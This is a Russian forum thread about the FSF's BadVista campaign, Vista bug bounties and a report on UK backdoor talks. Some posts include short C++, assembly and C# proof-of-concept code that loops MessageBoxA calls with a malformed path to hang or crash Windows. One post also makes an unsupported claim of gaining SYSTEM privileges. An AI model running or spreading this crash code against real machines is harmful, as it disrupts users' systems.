Автор Тема: Фонд свободного ПО (FSF) против Windows Vista  (Прочитано 8170 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн exBoMBeR

  • Ветеран
  • *****
  • Сообщений: 21338
  • Карма: -273
  • Пол: Мужской
    • Просмотр профиля
BadVista.org: FSF начинает кампанию против Microsoft Vista
Пресс-релиз Free Software Foundation (FSF)
Перевод: CITKIT.ru

http://badvista.org

18 декабря 2006 г

15 декабря 2006 г. организация Free Software Foundation (FSF) объявила о начале кампании BadVista.org, преследующей цели разъяснения вреда, который принесет пользователям компьютеров новая операционная система Microsoft Windows Vista, и пропаганды альтернатив из области свободного программного обеспечения, не подрывающих безопасность пользователей и поддерживающих их права на частную жизнь.

По словам администратора программ FSF Джона Салливана (John Sullivan), ?В Vista под видом дополнительных средств содержатся очень опасные вещи. Эти вещи особенно опасны с точки зрения наиболее важного аспекта владения компьютером и его использования ? возможности контроля его работы. Конечно, операционные системы Windows всегда были проприетарными и очень ограничительными, и это их сильно обесценивало. Но новые ?средства? ОС Vista являются ?троянским конем?, предназначенным для привнесения еще больших ограничений. Мы сконцентрируемся на выяснении подробностей работы этих средств, на том, как можно им противодействовать, и на том, почему люди должны быть бдительны.?

При проведении кампании будут организовываться эффективные и нестандартные акции ее сторонников, обращающие внимание публики на подрыв прав пользователей компьютеров, собираться факты, развенчивающие маркетинговую пропаганду Vista, и предоставляться дружественный к пользователю путь к переходу к использованию свободных операционных систем, таких, как gNewSense (http://www.gnewsense.org).

Исполнительный директор FSF Питер Браун (Peter Brown) заявил следующее: ?Пока компания Microsoft выводит на рынок свой наиболее крупный за всю ее историю продукт, маркетинговые деньги будут тратиться на попытки одурачить средства массовой информации и сообщество пользователей по поводу целей Vista. Наша кампания предназначена для предоставления ответов на важные вопросы. Можете ли вы освободить самого себя или свою компанию? Можете ли вы когда-нибудь освободиться от Microsoft? Как и в нашей кампании против ?Управления цифровыми ограничениями? (?Digital Restrictions Management?), мы стремимся продемонстрировать, что технические специалисты могут занимать активную общественную позицию, поскольку мы знаем о вреде, который принесет Vista?.

Среди прочего, BadVista.org будет концентрироваться на опасности, которую в Vista представляет ?вероломный компьютинг? (Treacherous Computing). Этот подход, обычно называемый в индустрии ?доверительным компьютингом? (Trusted Computing), представляет собой попытку превратить компьютеры из машин, управляемых своими пользователями, в машины, которые следят за своими пользователями и отказываются выполнять действия, которые не разрешены их производителями. Сторонники этих взглядов могут подписаться на получение дополнительной информации и участие в кампании на сайте http://badvista.org.
«И нет величия там, где нет простоты, добра и правды». Лев Николаевич Толстой.


Lelik_*

  • Гость
в инете уже объявлена (по-моему мелкософтом) плата за взлом висты и 7-го эксплорера - 8000 долларов кажется.
вэлкам!
угу, только не мелкософтом..
Цитировать
Американская компания iDefence, занимающаяся вопросами компьютерной безопасности, объявила о вознаграждении в 8 тысяч долларов хакерам, которым удастся обнаружить уязвимости в браузере Internet Explorer 7 и новейшей операционной системе от Microsoft Windows Vista, сообщает PC Magazine.
Конкурс хакеров станет частью программы ?деньги-за-уязвимость? (pay-for-flaw), целью которой является улучшение систем безопасности наиболее популярного программного обеспечения. Приз в 8 тысяч долларов получат только шесть умельцев, которые раньше всех пришлют результаты своей хакерской деятельности специалистам iDefence.

Для того, чтобы получить денежное вознаграждение, необходимо, чтобы обнаруженной уязвимостью можно было воспользоваться с удаленного компьютера, причем она должна присутствовать во всех последних обновления и дополнениях к IE или Vista. Ошибки, найденные в бета-версиях продуктов, поощряться вознаграждением не будут.

В настоящий момент iDefence ? далеко не единственная компания, согласная платить хакерам деньги за поиск уязвимостей в программах. Так, некоторое время назад Trend Micro организовала подобный конкурс с призовым фондом в 50 тысяч долларов. Награда досталась хакерам, сумевшим обнаружить уязвимости в Vista.
отсюда

Оффлайн exBoMBeR

  • Ветеран
  • *****
  • Сообщений: 21338
  • Карма: -273
  • Пол: Мужской
    • Просмотр профиля
18:04 16.02.2006
Британские власти требуют уязвимостей в Windows Vista

ИА "Клерк.Ру". Отдел новостей / Британские власти ведут переговоры с представителями Microsoft по поводу умышленного создания уязвимостей в системе защиты новой операционной системе Windows Vista, - чтобы сотрудники спецслужб могли проникать в компьютеры злоумышленников, сообщает BBC.

В связи с грядущим появлением новой операционной системы Windows Vista ученый из Кембриджского университета обратился к различным правительственным структурам с просьбой оказать давление на Microsoft и вынудить компанию умышленно создать ряд "лазеек" в защитной системе ОС Vista.

Академик Кембриджского университета Росс Андерсон выразил обеспокоенность по поводу того, данные, хранящиеся на машинах, работающих под управлением новой ОС будут слишком хорошо закодированы. Андерсон, специализирующийся в области систем безопасности, обратился с заявлением к британской Палате общин. В своем докладе профессор представил ряд доказательств необходимости умышленного создания уязвимостей в системе Vista. По его словам, это "поможет предотвратить террористические акты". Официальные лица сообщили, что переговоры об этом уже ведутся с Microsoft.

Напомним, что новая ОС от Microsoft использует систему кодирования файлов BitLocker Drive Encryption, связанную с чипом TPM (Trusted Platform Module) на материнской плате компьютера.

Представители Microsoft заявили, что Windows Vista - это самая защищенная из когда-либо созданных компанией Microsoft операционных систем. В то же время, сотрудники компании помогают силам охраны правопорядка разобраться в защитной системе Vista с целью предотвращения преступлений и продолжают тесное сотрудничество с правительственными организациями, чтобы сделать интернет максимально безопасным.
«И нет величия там, где нет простоты, добра и правды». Лев Николаевич Толстой.

Оффлайн exBoMBeR

  • Ветеран
  • *****
  • Сообщений: 21338
  • Карма: -273
  • Пол: Мужской
    • Просмотр профиля
Вариант на С++:

char bug [] = "\\??\\C:\\";
for(int i = 0; i < 10; i ++)
{
::MessageBoxA(0, bug, bug, MB_SERVICE_NOTIFICATION);
}

Наглядно показывает компетентность людей, разрабатывающих ось и ее ядро...

Попробовал скормить своему ассемблеру вот это ...

format PE GUI 4.0
include '%fasminc%\win32a.inc'

start:
  mov ecx, 10
.bug_loop:
  push ecx
  invoke MessageBox, 0, bug_text, bug_text, MB_SERVICE_NOTIFICATION
  pop ecx
  loop .bug_loop
exit:
  invoke ExitProcess, 0

bug_text db "\??\C:\", 0

data import

  library kernel32, 'KERNEL32.DLL',\
          user32, 'USER32.DLL'

  import kernel32,\
         ExitProcess,'ExitProcess'

  import user32,\
         MessageBox,'MessageBoxA'

end data

и запустить под Windows 2000 SP3 ... синего экрана не получилось, но комп пришлось перегружать резетом - все перестало запускаться/выключаться ... намертво завис даже диспечер задач. В зипе - получившийся экзешник (1кб весом) ... дальше полученные на экране мессаж боксы ...

Эх ... сколько я не прогал - добиться подобной нестабильности ядра от того же линукса мне так и не удалось даже используя напрямую системные вызовы int 0x80 ...

P.S. Попробовал дома этот же код под OEM версией Windows XP Home SP2 ... никакой реакции - показывает 10 мессаж боксов и продолжает нормально работать.
« Последнее редактирование: 18.01.07, 10:19:26 от exBoMBeR »
«И нет величия там, где нет простоты, добра и правды». Лев Николаевич Толстой.

Оффлайн Alt

  • Ветеран
  • *****
  • Сообщений: 2840
  • Карма: 54
  • Пол: Мужской
  • альтруист-мизантроп
    • Просмотр профиля
18:04 16.02.2006
Британские власти требуют уязвимостей в Windows Vista
чота это бред какойта. больше не рекламу похоже

Оффлайн Mikeman

  • Пользователь
  • **
  • Сообщений: 71
  • Карма: -2
  • Пол: Мужской
  • Это Я!
    • Просмотр профиля
Бред, ИМХО Люди наверно денег чтоли хотят срубить, типа как Евросоюз время от времени доит Microsoft.
Согласен!!! Это или сами Майкрософт для повышения популярности бучу подняли, либо завистники!!!!

Оффлайн exBoMBeR

  • Ветеран
  • *****
  • Сообщений: 21338
  • Карма: -273
  • Пол: Мужской
    • Просмотр профиля
Бред, ИМХО Люди наверно денег чтоли хотят срубить, типа как Евросоюз время от времени доит Microsoft.
Согласен!!! Это или сами Майкрософт для повышения популярности бучу подняли, либо завистники!!!!
Всегда умиляет подобные высказывания ... по вашему мир делится на Мелкософт и его завистников??? Т.е. если вас зовут не Билл Гейтс значит вы его завистник??? Ужос!!!
«И нет величия там, где нет простоты, добра и правды». Лев Николаевич Толстой.

Оффлайн SunKool

  • Ветеран
  • *****
  • Сообщений: 3217
  • Карма: 245
  • Пол: Мужской
  • Genius at work. ?
    • Просмотр профиля
мир делится на 2 части: Первая не любит Билла Гейтса, вторая о нем не знает.
Дымила, падая ракета
А от нее бежал расчет.
Кто хоть однажды видел это
Тот хрен к ракете подойдет.
 ДВЕ ДЕВЧУШКИ ИЗ ПСИХУШКИ ЕЛИ БУЛОЧКИ ВАТРУШКИ А ШАМАНКИ-НАРКОМАНКИ

Melkor

  • Гость
2Pantera:
Ну так что ? Принимаете пари? У вас будут такие возможности каких нет ни одного хакера. Вам не придется убивать охрану. Вам не придется искать с кого бы срезать палец, для того чтобы пройти биометрические тесты. Вам не придется судорожно искать способ вскрыть корпус сервера без мгновенного уничтожения данных, для того, чтобы подрубить к нему CD-ROM ( и это при вое сирен и едущей охране) ... Да много чего не придется...
В общем условия просто халявные. Тем более перед вами совершенно незащищенная система(судя по вашим словам):) Можете ломать локально, можете удаленно. Прям таки халявные 500 баксов так в руку и просятся.
Слабо?

Оффлайн Леха

  • Постоялец
  • ***
  • Сообщений: 189
  • Карма: 46
  • Пол: Мужской
  • Windows XP
    • Просмотр профиля
Слава самой небезопасной и ненадежной системы???

Позволю себе с вами не согласиться...приводить доказательства оч оч оч оч ломает, но если уж все настаивают...
Вы меня улыбаете.
Вот вам код, выдает с десяток Мессадж боксов , а затем Синий экран.
Вешать винду и получить привиллегии System через WIN API MessageBox ....
Эта бага (виндузятники, конечно, скажут что это фича такая) до сих пор не пофиксена. Работает от НТ до Висты.

[DllImport("user32.dll")]unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
  for(int i=0; i<10; i++)
      MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);
}
}

Расширение zip поменяйте на exe

У меня вообще написал "Необходимый файл динамической библиотеки MSCOREE>DLL не найден" :)
<marquee>aaa</marquee>

Оффлайн Леха

  • Постоялец
  • ***
  • Сообщений: 189
  • Карма: 46
  • Пол: Мужской
  • Windows XP
    • Просмотр профиля
Вариант на С++:

char bug [] = "\\??\\C:\\";
for(int i = 0; i < 10; i ++)
{
::MessageBoxA(0, bug, bug, MB_SERVICE_NOTIFICATION);
}

Наглядно показывает компетентность людей, разрабатывающих ось и ее ядро...

Попробовал скормить своему ассемблеру вот это ...

format PE GUI 4.0
include '%fasminc%\win32a.inc'

start:
  mov ecx, 10
.bug_loop:
  push ecx
  invoke MessageBox, 0, bug_text, bug_text, MB_SERVICE_NOTIFICATION
  pop ecx
  loop .bug_loop
exit:
  invoke ExitProcess, 0

bug_text db "\??\C:\", 0

data import

  library kernel32, 'KERNEL32.DLL',\
          user32, 'USER32.DLL'

  import kernel32,\
         ExitProcess,'ExitProcess'

  import user32,\
         MessageBox,'MessageBoxA'

end data

и запустить под Windows 2000 SP3 ... синего экрана не получилось, но комп пришлось перегружать резетом - все перестало запускаться/выключаться ... намертво завис даже диспечер задач. В зипе - получившийся экзешник (1кб весом) ... дальше полученные на экране мессаж боксы ...

Эх ... сколько я не прогал - добиться подобной нестабильности ядра от того же линукса мне так и не удалось даже используя напрямую системные вызовы int 0x80 ...

P.S. Попробовал дома этот же код под OEM версией Windows XP Home SP2 ... никакой реакции - показывает 10 мессаж боксов и продолжает нормально работать.

А в МЕ нормально все
<marquee>aaa</marquee>